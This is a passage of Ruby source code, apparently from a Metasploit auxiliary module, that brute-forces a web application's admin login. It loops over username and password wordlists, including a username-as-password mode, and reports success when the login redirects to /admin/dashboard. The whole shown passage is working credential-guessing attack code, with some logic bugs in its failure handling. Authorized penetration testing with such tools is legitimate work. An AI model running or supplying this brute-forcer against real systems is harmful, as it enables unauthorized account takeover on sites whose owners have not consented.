      },
    })
    if res && res.code != 200 #if request cod not 200 ok
      if res && res.headers['Location'] == '/admin/dashboard' #if signed web site
        print_good("Found #{username}:#{password}")
        @signed = true
      else #request not 200 error
        fail_with(Failure::UnexpectedReply, " Request Not Success Code #{res.code}")
      end
    end
  end

  def run
    check_variable #check variable, not use user_file if use username
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path,'/'),
      'method' => 'GET',
    })
    if res && res.code == 200
      vprint_status("Request 200 OK")
    else
      fail_with(Failure::UnexpectedReply, "Request Not Success Code #{res.code}")
    end

    if datastore["USERNAME"] != nil && datastore["PASS_FILE"] != nil
      unless ::File.exist?(datastore['PASS_FILE']) #check file exit, error not found if not exist file
        fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!"
      end
      @wordlist = ::File.open(datastore["PASS_FILE"],"rb") #open pass_file
      @wordlist.each_line do |password| #each line on wordlist
        password = password.strip # remove spaces
        if !@signed # continue if signed false
          brute_force(datastore["USERNAME"],password)
        end
      end
    end

    if datastore["USER_FILE"] != nil && datastore["PASSWORD"] != nil
      unless ::File.exist?(datastore['USER_FILE'])
        fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!"
      end
      @wordlist = ::File.open(datastore["USER_FILE"],"rb")
      @wordlist.each_line do |username|
        username = username.strip
        if !@signed
          brute_force(username,datastore["PASSWORD"])
        end
      end
    end

    if datastore["USER_FILE"] != nil && datastore["PASS_FILE"] != nil
      unless ::File.exist?(datastore['USER_FILE'])
        fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!"
      end
      unless ::File.exist?(datastore['PASS_FILE'])
        fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!"
      end
      @userlist = ::File.open(datastore["USER_FILE"],"rb")
      @userlist.each_line do |username|
        username = username.strip
        @passlist = ::File.open(datastore["PASS_FILE"],"rb")
        @passlist.each_line do |password|
          password = password.strip
          if !@signed
            brute_force(username,password)
          end
        end
      end
    end

    if datastore["USER_FILE"] != nil && datastore["USER_AS_PASS"] == true && datastore["PASS_FILE"] == nil
      unless ::File.exist?(datastore['USER_FILE'])
        fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exist!"
      end
      @userlist = ::File.open(datastore["USER_FILE"],"rb")
      @userlist.each_line do |username|
        username = username.strip
        @passlist = ::File.open(datastore["USER_FILE"],"rb")
        @passlist.each_line do |password|
          password = password.strip
          if !@signed
            brute_force(username,password)
          end
        end
      end
    end
  end
end